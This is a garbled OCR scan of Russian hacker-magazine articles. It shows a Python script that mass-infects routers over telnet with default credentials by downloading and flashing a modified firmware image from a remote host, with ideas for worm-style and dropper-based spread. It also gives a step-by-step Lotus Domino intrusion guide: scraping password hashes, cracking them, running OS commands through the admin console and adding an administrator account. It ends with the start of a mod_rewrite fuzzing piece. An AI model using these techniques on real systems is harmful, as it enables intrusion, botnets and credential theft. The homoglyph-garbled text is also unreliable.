243 0 □ <раѣЬ>/Ьі п/Ь01 1 </раі:Ь> 

244 I </ргодгат> 

245 </ргодсІ0І : 5> 

ргодсІѳТБ . хті С хт 1 ] [ + ] 

— ѴІ51Ж І_ІЫЕ — 



Добавление правила запуска нашей программы 
в ргодсЫз.хтІ с помощью редактора ѵіт. 

НЕКОТОРЫЕ ИДЕИ РАСПРОСТРАНЕНИЯ 

Свой прокси\сокс на чужом роутере — это здорово. Как, собственно, и 
спамящий по всем протоколам маршрутизатор. Это тебе не компьютер с 
ѴѴіпсІоѵѵз, которую переставляют каждый месяц :]. Роутеры часто не ме- 
няют и не перепрошивают. Да и кому кроме нас взбредет в голову сама 
идея инфицирования роутера? 

Не забывай, под контролем у нас весь трафик от пользователя/сети. 
На более мощных роутерах уже и 0005-бота возможно повесить. 
Спрятать файл/скрыть процесс, перехватывать запись в тЫ-блоки 
исключив затирание нашей программы — все, что угодно! 

Допустим, ты собрался взяться за написание серьезной программы 
для роутера. Важна очень хорошая отладка, наверняка придется 
кучу раз переписывать/восстанавливать образы... Это очень груст- 
ная перспектива. Даже руки немного опускаются, если еще и учесть, 
что ресурс перезаписи у Ріазб-памяти невелик (подробнее в доку- 
ментации к микросхеме памяти], и есть перспектива угробить ее. Но 
выход есть! Оети может эмулировать АВ7! Ты представляешь, какие 
это дает возможности и безграничное удобство? Теперь нам ничего 
не мешает написать что-то невероятно классное! 

Итак. Ты написал программу, проверил на своем или 1-2 чужих роу- 
терах, но ведь еще вся сеть впереди, вручную заражать муторно, на 
10-м роутере уже начинаешь проклинать весь мир, и плывет в глазах 
от верениц "саГ и "тН". Напишем программу для автоматизации 
этих рутинных действий. Я выбрал язык руОзоп. 

План работы таков: 

• составляем список роутеров, например, с помощью птар; 

• скрипт должен брать из списка по порядку ІР-адреса, заходить через 
Іеіпеі: со стандартным логином\паролем; 

• далее те самые действия: закачиваем модифицированный образ, 
перезаписываем, перезагружаемся. 

# ! /изг/Ьіп/епѵ руСЬоп 
#ЕпсосІе=ІЛ , Р-8 

ітрогС СеІпеСІіЬ, Сіте 

8ЕКѴЕК= " ТШРр : //апуГюзС . сот/Тз . ітаде" 

Тог асісіг іп ореп ( " ірІізТ . ТхТ " ) : 

ТеІпеТ = ТеІпеТІіЬ.ТеІпеТ (асісіг) 

ТеІпеТ . зеТ_сіеЬид1еѵе1 ( 1 ) 

ТеІпеТ . геасі_ипТі1 ( " Іодіп : " ) 

Тіше.зІеер(Б) 

ТеІпеТ .шгіТе ( " асітіп\п" ) 

ТеІпеТ . геасі_ипТі! ( " Раззѵсгогсі: " ) 



+ © 1 ГМе :///Гіоте/к. , .ОоЫусезіШйтіІ 

гооЬѵѴѴд^сІхЬ2Ъирк:0:0:гооЩ:/Ып/зЬ 
асЗтіп : ѵѴѴ д 2хсіхЬ 21Э и р к : 0 :0 :гооТ/:/Ъіп/зІі 

ѴѴеЬст показывает секреты 

ТеІпеТ .ѵѵгіСе ( " асітіп\п" ) 

ТеІпеТ . геа<і_ипТі1 ( " # " ) 

ТеІпеТ .шгіТе ( "ссі /ѵаг && ѵ?деТ " + 8ЕКѴЕК) 

ТеІпеТ . геа<і_ипТі1 ( " # " ) 

ТеІпеТ .хѵгіТе ( "саТ Тз. ітаде > /сіеѵ/тТсіЫоск/О " ) 
ТеІпеТ . геасі_ипТі1 ( " # " ) 

ТеІпеТ . ѵтгіТе ( " геЬооТ " ) 

ТеІпеТ . сіозе ( ) 

Логика работы скрипта очень далека от идеала, сейчас поясню, 
почему. Для начала следует проверять версию прошивки/ядра и 
модель роутера, ибо могут быть серьезные отличия в работе. Далее, 
вместо заготовок прошивок следует выкачивать образ файловой 
системы с роутера, распаковывать, модифицировать и отправлять 
обратно. Это исключит проблемы, возникающие с совместимостью 
в разных моделях/версиях прошивок, ведь устойчивость работы для 
тебя — самое главное. Также вирус может иметь функции червя, и, 
если есть желание, всегда можно прикрутить к нему сканер сети, 
брутфорс для НОР и подобные фишки. 

Есть еще один замечательный способ распространения. Ничего не 
мешает написать программу под ѴѴіпсІоѵѵз, которая будет иметь при 
себе (либо скачивать со своего сервера] образ файловой системы 
и заражать им роутер, если он присутствует. Распространять эту 
программу всеми «стандартными» способами: съемные накопители, 
эксплойты под программы, заражение других программ... Комбини- 
руя эти способы, можно устроить серьезную пандемию. Ты только 
представь себе эту картину — ведь подобные устройства распростра- 
нены повсеместно. 

ЗАЩИТА РОУТЕРА 

Раскопав все это, я подумал: как же можно защитить роутер? А то, гля- 
дишь, и сам попаду. Первым делом следует сменить пароль пользовате- 
лей на более сложный и длинный (ограничение — 8 символов), сменить 
баннеры и приветствия сервисов (Ьех-редактором, либо, что предпо- 
чтительнее, перекомпилировать программы), дабы птар или другие 
сканеры не могли определить версии сервисов. 

Также следует сменить порты, на которых висят демоны. Делается это 
путем модификации ргодбеіъ.хті. Убить іеіпеі (к нему проще всего по- 
добрать пароль, да и протокол незащищенный, зачем он нам], включить 
ГгеѵѵаІА, разрешить подключение к сервисам только с собственного 
ІР- или МАС-адреса. Также используй бгеѵѵаіі для защиты сети или 
компьютера, не зря ведь он присутствует. Грамотная настройка правил 
всегда поможет защититься. 

ЗАКЛЮЧЕНИЕ 

Многие, не только О-Ыпк-роутеры и прочие подобные устройства по- 
строены на чипе АР7, в список входят Асогр, ІЧеІбеаг, Ыпкзуз, Асбопес... 
Довольно популярен этот АР7 вместе с МопІаѴізІа. Отсюда следует, что, 
используя тот же ГооІсГіаіп, без особых проблем можно провести дей- 
ствия, описанные в статье. 

Задумайся: помимо вредоносных действий можно сделать и полез- 
ное/приятное себе и другим (не спорю, удовольствие от взлома заме- 
нить невозможно, но все же]. Можно делать свои прошивки, напри- 
мер, более мощные роутеры, сособные качать/раздавать торренты... 
Все модели имеют 115В 1 .1 -интерфейс, но в младших моделях он не 
распаян. Добавить к ядру ІЭ5В-модуль и драйвер файловой системы, 
снабдить роутер Ріазб-памятью — и в итоге получится этакое сетевое 
хранилище за небольшие деньги. Вариантов масса, а идеи должны 
возникать тысячами — не ограничивай себя, твори и созидай! тг 
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■ ■ «Александр «зЬ2кегг» Поляков гізесгд.ги 




Привет всем читателям. На этот раз я немного уйду в сторону от Огасіе и расскажу 
про другое, не менее распространенное в корпоративной среде приложение 
- І_оІи$ Оошіпо. Оопііпо - это такое огромное клиент-серверное приложение, 
совмещающее в себе и почтовую систему, и систему документооборота, и ЮАР- 
хранилище, и еще множество всего, где может храниться полезная информация. 



ОПИСАНИЕ 

ІВМ Ьоіиз Оотіпо Зегѵег — сервер приложений системы І_оІіі5, 
который предоставляет ряд сервисов и может использоваться для 
построения корпоративных систем электронного документооборота, 
которая имеет в своем составе большой набор модулей. Основные 
из них: почтовый сервер, НТТР-сервер и сервер баз данных. Так как 
в большинстве случаев во внешнюю сеть выставлен НТТР-сервер, 
то на его уязвимостях мы сосредоточим внимание. Проводить все 
грязные опыты будем на последней версии І_оІіі5 Оотіпо 8.5.1 под 
ѴѴі псіоѵѵз. 



ГДЕ ОБИТАЮТ ЛОТУСЫ? 

Собственно, для обнаружения в сети ѴѴеЬ-сервера І_оІіі5 (І_оІіі5 
Оотіпо ЫТрсІ] можно воспользоваться сетевым сканнером ІЧтар со 
следующими параметрами: 

№пар -зѴ 172.212.13.0.24 -р 80 

№пар зсап герогТ Тог 172.212.13.13 
НозТ із ир (0.017з ІаТепсу) . 

№эТ зіюѵт: 65533 ТіІТегесІ рогТз 
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Так выглядит исходный код страницы с хэшем пароля 



РОЕТ 8 ТАТЕ ЗЕКѴІСЕ ѴЕК8ІСЖ 

80/Еср ореп ЕШСр ЬоСиз Бошіпо ЕШСрсІ 

Судя по описанию, мы наткнулись на один из серверов 
І_оІи5, но для верности лучше проверить. Для того, чтобы 
убедиться, что это точно 1_оІиз Оотіпо ЬМрсІ, можно 
обратиться по адресу: ШрУ/зегуегпате/Еютераде.пзЕ 
Если мы увидим красивое окошко с номером версии, то, 
вероятнее всего, мы наткнулись на то, что искали. 

На самом деле гораздо эффективнее будет восполь- 
зоваться методикой Ооодіе Наск и найти множество 
Еоіиз-серверов в интернете, используя простейший 
запрос іпигЕЕютераде.пзЕ В результате этого запроса 
нам откроются ссылки на тысячи потенциальных серверов 
Еоіиз. Сразу предупрежу тебя, чтоб ты даже не пытался 
тренироваться на этих серверах, так каку Лотуса очень 
навороченная и удобная система протоколирования всех 
запросов, и вычислить злоумышленника не составит 
труда. 

ОСМОТР ПАЦИЕНТА 

Итак, начнем анализ подопытного. Обычно при попытке 
обращения к корневой директории ЕоТиз-сервера мы 
получаем окошко с запросом аутентификации, что сразу 
же отпугивает неопытных хакеров. Очень вероятно, что 
администратор установил запрос аутентификации только 
на обращение к корневой папке, а все остальные ресурсы 
остались открыты. Что же там могут быть за ресурсы, и чем 
они нам полезны? 

ЗАГАДОЧНЫЙ .ЫЗР 

Если кратко, то ЕоШз хранит всю информацию в контей- 
нерах собственного формата с расширением пзЕ Данный 
контейнер представляет собой набор данных и формат 
их представления. Если говорить проще, то каждый пзб 
ресурс — это небольшой отдельный сайт со своей базой 
данных. Собственно, этих самых пзЛфайлов может быть 
на сервере огромное количество, причем как стандартных, 
так и разработанных специально под нужды компании. 

Вот список наиболее популярных пзЛфайлов, которые 
могут присутствовать: 



/сегРІод . пзЕ 
/с!Ьа4 . пзі: 
/Еютераде . пзі: 
/Іод . пз:Е 




Про остальные файлы ты можешь узнать, скачав, к при- 
меру, утилиту ботіпоЕіипІюг, к которой прилагается список 
стандартных пзЛфайлов. Ко всем этим файлам есть опи- 
сания, и во многих из них есть интересные нам данные, 
но начнем мы с самого главного файла — патез.пзЕ 
Данный ресурс представляет собой полную базу данных 
по сотрудникам, их почтовым адресам и по множеству 
другой полезнейшей информации, такой как: версии ОС 
пользователей, версии программного обеспечения ЕоГиз 
ІЧоіез и прочие данные. А знаешь, что самое интересное? 
Этот ресурс на большинстве серверов доступен аноним- 
ному пользователю! 

Векторов дальнейшей атаки на самом деле огромное 
множество, учитывая то, что у нас есть такая интересная 
информация. Вотлишь часть из них. 

1. Получив список логинов пользователей, мы можем 
подбирать пароли к их почтовым ящикам. Кроме того, мы 
можем узнать, кто из этих пользователей администра- 
тор, и подобрать пароль к его аккаунту, что принесет нам 
большую пользу. 

2 . Имея на руках почтовую базу сотрудников с именами, 
должностями и прочей информацией, грех не устроить 
рассылку и, используя методы социальной инженерии, 
добиться от пользователей нужных нам действий. 

3. Кроме того, в базе патез.пзі 1 хранится информация о 
версии операционной системы пользователя и версии 
клиентской программы ИоШз Ыоіез, которую он исполь- 
зует для получения почты. Это дает нам огромный ресурс 
для социальной совместно с О-уязвимостями или старыми 
багами под уязвимое клиентское ПО. Здесь можно ис- 
пользовать что угодно, от последних дыр в ІЕ (привет 
Алексею Синцову] и РЭЕ до уязвимостей, обнаруженных 

в клиентском программном обеспечении Еоіііз ІМоіез, а 
точнее — в его АсбѵеХ- компонентах (к примеру, іпоіез. 
би х1"огсе. ізз. пеі/хбогсе/хбсі Ь/1 1339], которые доступны в 
интернете. 



> ѵѵагпіпд 

Внимание! 
Информация 
представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни 
редакция за 
твои действия 
ответственности не 
несет! 



/патез . пзР 
/ас!тіп4 . пзР 
/асітіп . пзР 
/аіод . пз:Е 
/сіотіод . пз:Е 
/саСаІод . пзЕ 



ПОВЫШЕНИЕ ПРИВИЛЕГИЙ 

На самом деле озвученная информация — это далеко не 
все, что можно получить из ресурса патез.пзЕ Самое 
сладкое вот в чем — в 2005 году в данном ресурсе была 
обнаружена уязвимость, которая позволяет читать хэши 
паролей пользователей системы. Причем уязвимость 
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ѴѴеЬасІтіп.пгГ показывает ошибку Ыѵе сопзоіе в действии - вывод списка 

запуска консоли возможных команд 




банальнейшая. Для получения хэша необходимо перейти на страницу 
информации о конкретном пользователе и открыть исходный код полу- 
ченной страницы. Хэш пароля хранится в НісИеп поле НТТРРаззѵѵогсІ 
или б зр НТТРРаззѵѵогсІ (в зависимости от версии приложения], кроме 
того, ты можешь встретить два разных алгоритма хэширования, о 
которых поговорим чуть позже. Что удивительно, уязвимые системы 
встречаются до сих пор! 

Поскольку зачастую количество пользователей исчисляется сотнями 
или тысячами, то получение хэшей желательно автоматизировать. 

Но тут не стоит беспокоиться, ибо все уже сделано до нас. Еще в 
■>2007 году был написан эксплойт га р1;ог_сІот іпоЬазЬ, доступный в 
Сети, который скачивает хэши всех пользователей, а также утилита 
ОотіпоНазЬВгеакег, осуществляющая подбор паролей по словарю. 
Эксплойт лучше переделать, так как он выдает слишком много лишней 
информации, и ее потом неудобно подавать на вход переборщику 
паролей. Что касается самого переборщика, то он работает только 
по словарю и имеет следующий недостаток — мы не знаем, от какого 
пользователя расшифровался хэш, так как на вход подаются только 
хэши без привязки клогинам. Таким образом, я бы рекомендовал 
использовать ЭоЬпТЬеРіррег с патчем от щтЬо, ибо Джон не только не 
имеет перечисленных недостатков, но и еще умеет расшифровывать 
новые «соленые» хэши, чего не умеет ОотіпоНазЬВгеакег. 

Итак, как я уже говорил, хэши в І_о1:и5 бывают двух видов: 

1. Обычные (32 символа в НЕХ] пример: 

<іприС пате= " $с1зрРаззѵ\гогсШідезС " Суре= "Мсісіеп" ѵаіие 

= " Р053 89С37С8502 60Р27 8РЕБ23 334С172 " > 




Имя пользователя : хэш 
Имя пользователя : хэш 



Имя пользователя : хэш 

Запускать переборщик необходимо со следующими параметрами: 
./ 3 <эЪ.п НАЗН.СхС --ТогшаС = 1оСиз5 



2 . С использованием случайных значений (22 символа начинающиеся Для расшифровки «соленых» хэшей необходимо на вход программе 
с С] пример: бобпТЬеВіррег подать файл НА5Н2.1;х1: вида: 



<іприС пате= " $сбзрНТТРРазз^ог<Т" Суре= "Ьісісіеп" 
ѵа1ие=" (СРгтг) А4УшР9С05ѵНп09дІ ) "> 



Имя пользователя: (хэш) 
Имя пользователя: (хэш) 



Для расшифровки обычных хэшей необходимо на вход программе 

боЬпТЬеВіррег подать файл НАЗН.М вида: Имя пользователя: (хэш) 



Результат выполнения команды 




► обо 
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Джон после патча умеет ломать лотусовые 
пароли 



Запускать переборщик необходимо со следующими пара- 
метрами: 

./Іоіт НАЗН . СхС --ТогтаС=с1отіпозес 

Вот, собственно, и все, напоследок могу только пореко- 
мендовать набрать разных словарей и запустить перебор 
параллельно брутом и словарями для большей эффектив- 
ности. В случае успеха, что встречается довольно часто, 
так как парольные политики в Оотіпо по умолчанию от- 
ключены, мы получим список расшифрованных паролей 
пользователей системы І_оІиз Оотіпо на ѴѴеЬ-доступ. 

Пусть там будут и не все пользователи, но все же шансы, 
что из тысячи хоть кто-нибудь расшифруется, достаточно 
велики. 

АДМИНИСТРИРОВАНИЕ 

Итак, предположим, что мы расшифровали пароль ад- 
министратора (если нет, сидим и перебираем дальше :]] 

— это есть очень хорошо. Теперь перед нами открываются 
просторы доступа ко всем находящимся на сервере 
пзі-файлам, которых, как я уже говорил, предостаточ- 
но. Интересный ресурс — Іод.пзі, на нем можно найти 
и посмотреть все логи доступа к серверу по различным 
критериям и узнать, к примеру, каким браузером поль- 
зуются пользователи. Также интерес представляет саіаіод. 
пзі. Доступ к почте каждого сотрудника можно получить, 
обратившись к директории /таіі/логинсотрудника.пзі. 

Но самый большой интерес для нас представляет ресурс 
ѵѵебасітіп.пзі (зегѵегпате/ѵѵеЬасІтіп.пзІ). Это админ- 
ка ѴѴеЬ-сервера І_оІиз Оотіпо со всеми вытекающими 
последствиями. Имея доступ к ней, можно создавать, 
изменять и удалять пользователей, назначать для них 
группы и выполнять всевозможные административные 
задачи. Получение административного доступа к системе 
І_оІиз Оотіпо практически всегда означает получение до- 
ступа к ОС, если не используются расширенные настройки 
безопасности, такие как: пароль на консоль (иногда встре- 
чается) или ограничение прав учетной записи в ОС (на 
практике крайне редко). Стоит отметить, что в ОС ѴѴі псіоѵѵз 
по умолчанию доступ будет получен под учетной записью 
І_осаІ Бузует, так как служба запущена от имени І_осаІ 
Зузіет, а в ІІпіх доступ будет получен от имени неприви- 
легированной учетной записи. 

Итак, что же предоставляет нам ѵѵебасітіп.пзі? В этом 
приложении есть различные опции по управлению 
сервером, в том числе и ряд оболочек для выполнения 
сервисных команд для репликации и прочих администра- 
тивных задач. Для выполнения сервисных команд можно 
использовать две различные консоли: Оиіск Сопзоіе и 
І_іѵе Сопзоіе. Но не тут-то было. Эти консоли — не то же 
самое, что консоль в ОС, так как набор команд там строго 
определен и заточен под задачи І_0ТІІ5. 

К нашему счастью, в бизнес-логике этой консоли есть 




Иногда на патез пзі стоит пароль 



уязвимость, которая заключается в том, что команда І_оасІ 
использует в качестве аргумента не список команд, а 
реальные исполняемые файлы в системе. То есть, исполь- 
зуя небольшой трюк можно запускать исполняемые файлы 
доступные в директории РАТН операционной системы 
через команду І_оасІ (спасибо за данный метод Евгению 
Киселеву, автору книги «Безопасность ІВМ боіиз ІЧоІез/ 
Оотіпо Р7», которую настоятельно рекомендуется почи- 
тать тем, кого интересует безопасность боіиз). Рассмотрим 
эти две консоли поподробнее. 

ОБОЛОЧКА УѴЕ С0Ы50І.Е 

Наиболее удобная оболочка для выполнения называется 
І_іѵе Сопзоіе, но, к сожалению, ее использование обуслов- 
лено двумя проблемами. Первая проблема заключается 
в том, что данная консоль не включена по умолчанию и 
для ее включения необходимо перезагружать сервер, что 
не очень хорошо. Вторая особенность — данная оболочка 
работает по своему протоколу с использованием порта 
2050, и с большой вероятностью в случае подключения 
через интернет данный порт будет зафильтрован. Таким 
образом, данный вариант не является универсальным, так 
что идем дальше. 

ОБОЛОЧКА ОШСК С0Ы30І.Е 

Второй вариант — это использование урезанной версии 
консоли — Оиіск Сопзоіе. Данная консоль имеет неприят- 
ную особенность — результат выполнения команды не 
отображается, таким образом, мы можем выполнять 
команды только вслепую. Ладно если нам нужно просто 
выполнить команду, в которой мы уверены, но если нам 
захочется прочитать содержимое файлов — тут без трюков 
не обойтись. На самом деле проблема очень похожа на 
ВІіпсІ ЗОЕ Іщесііоп, так что и методы надо применять по- 
хожие, только с учетом особенностей. 

ПОЛУЧЕНИЕ ДАННЫХ 

Давай проанализируем, что мы вообще можем делать в 
административном интерфейсе, чтобы понять, что из этого 
нам поможет для получения результатов команд. Первое, 
что бросается в глаза — это меню Рііез, где, как хотелось 
бы верить, мы сможем читать файлы, но и тут нас под- 
жидает неприятная участь. Читать файлы нельзя, можно 
только делать листинг директорий и видеть имена файлов. 
И только если у них расширение .пзі. 

Первая сумасшедшая идея, которая приходит в голову 
— это разбивать на строки вывод результата выполнения 
команды и создавать файлы, в названии которых будет 
кусок результата выполнения команды, а расширением бу- 
дет .пзі. Таким хитрым и довольно извращенным способом 



НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

• сізесгд.ги/радез/ 
риЬ/ — Исследования 
из серии «Проник- 
новение в ОС через 
приложения» 

• сѵбзес.сот/ѵиіп/ 
беіаиіі сопіідигаііоп 
іпіогтаііоп сіізсіо- 
зиге Іоіиз сіотіпо. 

— Уязвимость 
раскрытия информа- 
ции в І_оІиз Оотопо. 

• ехрІоіІ-сіЬ.сот/ 
ехрІоіІз/3302 — 

Эксплойт для 
автоматизированной 
скачки хэшей. 

• зесигііеіпіо.сот/ 
сІоѵѵпІоасІ/сІбЬ.гір — 
Утилита для подбора 
паролей по словарю 
Оотіпо Назб Вгеакег. 

• орепѵѵаіі.сот/ 
щбп/ — Утилита 
ЗоЬпТЬеРіррег для 
взлома паролей. 

• оепѵѵаіі.сот/ 
Іобп/сопІгіЬ/іобп- 

1 .7.5-щтЬо-2.сШ.д2 

— Патч для утилиты 
ЗоЬпТЬеРіррег для 
взлома паролей 

в Оотіпо старых 
и новых версий. 

• ситепіз.ізз.пеі/ 
ѵѵбііерарегз/сіотіпо. 
дбі - ІВМ 155 ‘Іоіиз 
Оотіпо Зесигііу” 2002 

• зесіізіз.огд/реп- 

Іезі/2008/Маѵ/64 

— Репіезііпд І_оІиз 
Оотіпо. 
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Сайт лотуса 



мы будем получать информацию о результате работы команды. Для 
этого необходимо последовательно запустить две команды (спасибо 
Алексею Синцову за набросанный скрипт): 



Іоасі. стсі /с "сН_г /В /В > зк2кегг . оик " 

Іоасі стсі /с "РОК /Р "с!е1ітз = " %і Ш ( зЬ2кегг . оик ) ВО 
ЕСНО > С : \1окиз\<іотіпо\зЬ.2кегг\ " %і " . пзі: " 



Первая команда сохраняет результат команды (в нашем примере это 
команда йІР) в файл зЬ2кегг.оиБ Вторая команда разбивает результат 
вывода первой и создает необходимые файлы. В результате в папке 
СЛіоІизѴботіпоѴзЬЗкепЛ мы увидим множество файлов, в именах 
которых будет результат выполнения команд. 

На самом деле есть способ гораздо проще, но при этом будет вероят- 
ность, что он не заработает там, где безопасно расставлены права. На 
практике мне такого не встречалось, так что можно использовать этот 
метод практически везде. Метод очень прост и заключается в следую- 
щем — необходимо найти директорию, в которую мы можем писать, и 
которая будет доступна через ѴѴеЬ-интерфейс. Такая директория есть 
по умолчанию в версиях 6.5 и 8.5 (в других она, скорее всего, тоже 
присутствует, но подтвердить нет возможности). В ОС ѴѴіпсІоѵѵз данная 
директория в результате установки по умолчанию выглядит следую- 
щим образом: 



С : \Ьокиз\Ботіпо\сіака\(іотіпо\]ткт1\(іоші1оа(і\^і1езекз\ 



Для того, чтобы обратиться к данной директории через ѴѴеЬ- 
интерфейс, необходимо пройти по следующей ссылке: ЫТр:// 
зегѵегпате/сІоѵѵпІ.оасіЛіІ.езеІз . Таким способом можно получить резуль- 
тат выполнения команды на сервере Боіиз. 

Альтернативный сценарий выполнения команд. 

Кроме трюка с Іоасі есть еще один способ выполнения команд — че- 
рез так называемый планировщик. Находится он в меню 5егѵег-> 
5іаІи5->5сЬесІиІ.е5->Ргодгапп5. Используя этот планировщик, можно 
также запускать любые команды в ОС. 



Данный пароль никогда не передается по сети и используется для 
расшифровки Ю-файла, а аутентификация происходит уже при помо- 
щи расшифрованной информации. Итак, для того, чтобы подключиться 
к системе с использованием клиентского приложения, нам необходи- 
мо получить 2 вещи: Ю-файл и пароль к нему. Выглядит сложнее, чем 
в случае с ѴѴеЬ, но не безнадежно. 

Для того, чтобы получить Ю-файл, можно воспользоваться уязви- 
мостью раскрытия информации в службе Боіиз Ботто. Уязвимость 
заключается в возможности получения Ю-файла пользователя, в 
случае, если известен его логин. Логин можно либо подобрать, либо 
воспользоваться уязвимостью в патез.пзі, описанной выше. Второй 
способ получения Ю-файла — попытаться откопать его в том же 
патез.пзЕ Очень часто в профиле пользователя, доступном без аутен- 
тификации через ѴѴеЬ-интерфейс, есть ссылка на скачку его Ю-файла. 
С первой проблемой разобрались, что же делать со второй? На самом 
деле тут все банально. Пользователи очень часто ставят простые па- 
роли на Ю-файл, так что можно его подобрать, тем более, что для этого 
есть специализированный софт в количестве, как минимум, 3-х утилит 
(зтазЫпдраззѵѵогсІз.сопп/З-ЬезЫоІиз-поІез-раззѵѵогсІ-гесоѵегу-ітее- 
зоЛѵѵагез), причем одна из них (ІРП) абсолютно бесплатна. 

ЗТЕР ВѴ ЗТЕР НОѴѴТО 

Итак, подведем итоги и создадим небольшой гайд по получению до- 
ступа к БоЮз Ботто. 

Для получения доступа к серверу выполняем следующие действия: 
Если есть ѴѴеЬ-доступ: 

1. Запускаем утилиту га р1:ог_сІот іпоЬагЬ и собираем хэши паролей: 
Угаріог сІоппіпоЬазЬ 192.168.0.202 

2 . Сохраняем хэши в формате, приведенном в статье; 

3. Запускаем ЗоЬпТЬеПіррег и подаем на вход список имен пользова- 
телей и хэшей: 

./)оЬп НА5Н.М -ЛогтаЫоІизб 

4 . В случае расшифровки хэша администратора обращаемся к консоли 
ѴѴеЬ-администрирования по адресу: 

ЬіІрУ/зегѵегпате/ѵѵеЬасІппіп.пзІ 

5 . В Оиіск Сопзоіе набираем команду, добавляющую в ОС нового 
пользователя: 

І оасі стсі /с пеі изег Ьаскег іатзіирісі /асИ 

6. Чтобы проверить, выполнилась ли команда, выводим списоктеку- 
щих пользователей и сохраняем вывод команды в файл: 

Іоасі стсі /с пеі изег > С:\ІоІиз\Ротіпо\сІаІа\сІотіпо\Ыт[\боѵѵп[оасІ\ 
ЮезеІзМ .М 

Для просмотра результата выполненной команды обращаемся по 
следующей ссылке: 

ЫірУ/зегѵегпате/боѵѵпІоабЛіІезеІз/І Дхі , и, в случае успеха, видим 
подтверждение выполненной команды; 

7 . Если не получилось, пробуем выполнить команду через Ргодгат. 

Если есть МРРС-доступ: 

1. Берем список пользователей из патез.пзі (или подбираем) и пы- 
таемся получить Ю; 

2 . В случае получения Ю пытаемся расшифровать пароль при помощи 
утилит указанных в статье; 

3. В случае успеха пытаемся подключиться при помощи БоШз 
Асіт іпізЕгаЕог, а далее начинаем с пункта 5 предыдущего варианта. 



КЛИЕНТ-СЕРВЕРНОЕ ВЗАИМОДЕЙСТВИЕ 

Выше мы рассматривали вопросы безопасности ѴѴеЬ-доступа к систе- 
ме БоШз Ботто, но есть еще и другой протокол (ІЧПРС на 1352 порту), 
по которому можно подключиться к системе. Этот протокол позволяет 
подключаться к Боіиз Ботто серверу, используя клиентские програм- 
мы БоШз Эезідпег (разработчики), Боіиз Ыоіез (простые сметные) и 
БоЮз Асітіпізігаіог (спасибо, кэп). Для подключения к серверу клиент 
должен иметь некое подобие сертификата, в системе Боіиз Ботто 
это файл с расширением Ю. Помимо этого файла для подключения 
необходимо иметь и пароль к нему. 



и что потом? 

В статье я попытался представить основные способы получения 
шелла на сервере через уязвимости и недостатки конфигурации Боіиз 
Ботто. Ряд вопросов, таких как: подробности получения Ю-файла, 
прочие критичные пзі-файлы и ошибки типа хзз в ѴѴеЬ-доступе, полу- 
чение доступа к другим серверам через репликацию и прочие аспекты 
безопасности, описание которых выходит за рамки данной статьи, я 
оставлю тебе для самостоятельного изучения. Старательно используй 
собранные ссылки на ресурсы, приведенные в этой статье, а также по- 
сещай сайт нашей исследовательской лаборатории ОЭесРО.ги, и, если 
есть желание, присоединяйся (гезеагсбйсізес.ги). т 
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Реклама 



ѴѴѴѴѴѴ.ХАКЕР.ГШ 
ХАКЕРСКАЯ ПОЧТА 
В ДОМЕНЕ гаХАКЕР.КО 






ФАЗЗИНГ САЙТА. «ЗАЩИЩЕННОГО» МОО_КЕѴѴКІТЕ 

Все чаще в Сети можно встретить сайты, которые скрывают параметры, 
передаваемые приложению посредством модуля АрасНе - той геѵѵгііе. Часто у 
веб-разработчиков создается иллюзия, что таким образом можно защититься от 
атак 501 Іщесііоп, Сгозз-Зііе Зсгірііпд и т.п. На самом деле это распространенное 
заблуждение, аналогичное тому, что сокрытие йпдегргіпі-сервисов увеличивает их 
безопасность. Безусловно, использование тосІ_геѵѵгіІе для сокрытия передаваемых 
параметров к приложению, равно как и сокрытие отпечатков, является некоторой 
преградой для атакующего. Но, как говорится, «нет такой преграды, которую нельзя 
было бы обойти»! 
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МосІ_геѵѵгіІе — достаточно мощный инструмент для УКІ_- 
преобразований «на лету». Этот замечательный модуль веб-сервера 
Арасбе предоставляет поистине безграничные возможности. На 
данный момент модуль чаще всего применяется для: 

• поисковой оптимизации (ЗЕО); 

• защиты от прямых загрузок, так как скрывается реальное местополо- 
жение файла; 

• сокрытия иерархии поступающих параметров, каталогов и сцена- 
риев веб-приложения путем их централизованного динамического 
преобразования; 

• разграничения доступа: тосІ_ге\л/гі1:е может проверять значения 
НТТР-заголовков, в том числе значение С00К1Е на соответствие 
правилам и по результатам проверок проводить (или не проводить) 
перенаправление. 

Чаще всего корректно настроенный тосІ_геѵѵгіІе затрудняет воз- 
можности поиска и эксплуатации уязвимостей веб-приложения. Это 
происходит по следующим причинам: 

1. Трудно распознать реальное предназначение элемента ЕІРЕ. На- 
пример, если мы видим ссылку вида ЬирѴ/ѵѵѵѵѵѵ.ехаппрІе.сопп/ппаіп/ 
зеагсб/зігока роізка , невозможно понять, какой из элементов ЕІРЕ 
является относительным путем от корневого каталога веб-сервера; 
что является названием сценария, а что является параметром этого 
сценария. Это сильно затрудняет анализ структуры веб-приложения. 
Например, следующие правила позволят одной и той же ссылке 
соответствовать различным реальным представлениям структуры 
веб-приложения: 

КеѵлгіРеКцІе А зеагс1т/ ( . + ) $ зеагск . р1ір?зеагс]т=$1 

При таком правиле осыпка ЬирУ/ѵѵѵѵѵѵ.ехаппрІе.сопп/ппаіп/зеагсЬ/зІгока 
роізка соответствует сценарию зеагсИ.рИр, который располагается в 



папке /таіп/ относительно корневого каталога веб-сервера, вызванному 
с параметром зеагсИ=зДока_роізка 

КетлпгіДеКиІе А (.+)/(.+)$ зсгірк . р]тр?асЦ = $1&ѵа1ие=$2 

По данному правилу та же самая ссылка соответствует сценарию 
зсгірЕрбр, который находится в папке таіп и вызван с параметрами 
ас1:=5еагсЬ&ѵаІие=5І:гока_роІ5ка 

КетлпгіСеКиІе А (. + )/ (.+)/(.+)$ 

$1 .р]тр?ѵа1ие1 = $2&ѵа1ие2 = $3 

А по этому правилу такая же ссылка соответствует сценарию 
таіп.рбр, который находится в корневом каталоге веб-сервера и 
вызван с параметрами ѵаІие1=5еагсЬ&ѵаІие2=5Ітока_роІ5ка 
Кроме того, благодаря гибкости используемых тосІ_ге\л/гі1:е регулярных 
выражений, даже схожие по виду ЭКЕ-адреса могут обращаться к 
абсолютно разным сценариям. Например, данные правила: 

КешгіСеКиІе А (. + )/(. + )$ зсгірСІ. 

ркр?ѵа1ие1=$2&ѵа1ие2=$3 

КетлпгіЦеКиІе А (. + )/(. + )/(. + )$ зсгірС2 . 
р!ір?ѵа1ие1 = $2&ѵа1ие2 = $3 

отправят два схожих запроса разным сценариям: 

ТЩЦр : / /ш<м. ехатріе . сот/зСгока1/зСгока2 

ТЩЦр : / /шт. ехатріе . сот/зкгока1/зкгока2 /зкгокаЗ 

